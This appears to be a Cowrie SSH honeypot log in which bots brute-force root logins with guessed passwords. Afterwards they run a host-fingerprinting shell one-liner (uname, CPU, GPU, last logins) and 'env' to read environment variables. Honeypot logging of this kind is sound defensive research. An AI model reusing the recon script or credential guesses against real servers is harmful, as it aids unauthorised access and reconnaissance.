{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:31:27.050698Z","src_ip":"45.88.8.215","session":"f7da075aafa8"}
{"eventid":"cowrie.login.success","username":"root","password":"Nishith@123","message":"login attempt [root/Nishith@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:31:29.098609Z","src_ip":"45.88.8.215","session":"f7da075aafa8"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:31:29.500706Z","src_ip":"45.88.8.215","session":"f7da075aafa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43412,"dst_ip":"1.2.3.4","dst_port":22,"session":"594c88dae85b","protocol":"ssh","message":"New connection: 212.227.235.229:43412 (1.2.3.4:22) [session: 594c88dae85b]","sensor":"my-vps","timestamp":"2025-08-26T20:31:43.763152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:31:45.552829Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:31:45.555788Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54154,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e7df27d5a77","protocol":"ssh","message":"New connection: 212.227.125.160:54154 (1.2.3.4:22) [session: 0e7df27d5a77]","sensor":"my-vps","timestamp":"2025-08-26T20:31:46.670492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:31:48.506147Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:31:48.507408Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.login.success","username":"root","password":"root1","message":"login attempt [root/root1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:31:52.975748Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.login.success","username":"root","password":"root1","message":"login attempt [root/root1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:31:54.106987Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:31:58.483870Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.484590Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.485139Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.486170Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.487691Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.488361Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.489179Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.490620Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.491408Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.491941Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.492706Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.493529Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:31:58.493894Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:31:59.644679Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:31:59.645725Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.session.closed","duration":"15.9","message":"Connection lost after 15.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:31:59.647106Z","src_ip":"212.227.235.229","session":"594c88dae85b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:32:01.519112Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.519805Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.520481Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.521489Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.522797Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.523793Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.524692Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.525784Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.526423Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.527079Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.527540Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.528162Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.528673Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.854125Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.855284Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.session.closed","duration":"15.2","message":"Connection lost after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:32:01.856445Z","src_ip":"212.227.125.160","session":"0e7df27d5a77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36752,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2c031c9552e","protocol":"ssh","message":"New connection: 212.227.235.229:36752 (1.2.3.4:22) [session: d2c031c9552e]","sensor":"my-vps","timestamp":"2025-08-26T20:32:47.852702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:32:48.053411Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:32:48.055712Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R","message":"login attempt [root/1q@W3e$R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:32:48.803719Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:32:49.407158Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-26T20:32:49.407921Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:32:49.592685Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:32:49.603391Z","src_ip":"212.227.235.229","session":"d2c031c9552e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60386,"dst_ip":"1.2.3.4","dst_port":22,"session":"146251f6b2e4","protocol":"ssh","message":"New connection: 217.72.205.35:60386 (1.2.3.4:22) [session: 146251f6b2e4]","sensor":"my-vps","timestamp":"2025-08-26T20:33:07.216049Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:33:07.217322Z","src_ip":"217.72.205.35","session":"146251f6b2e4"}
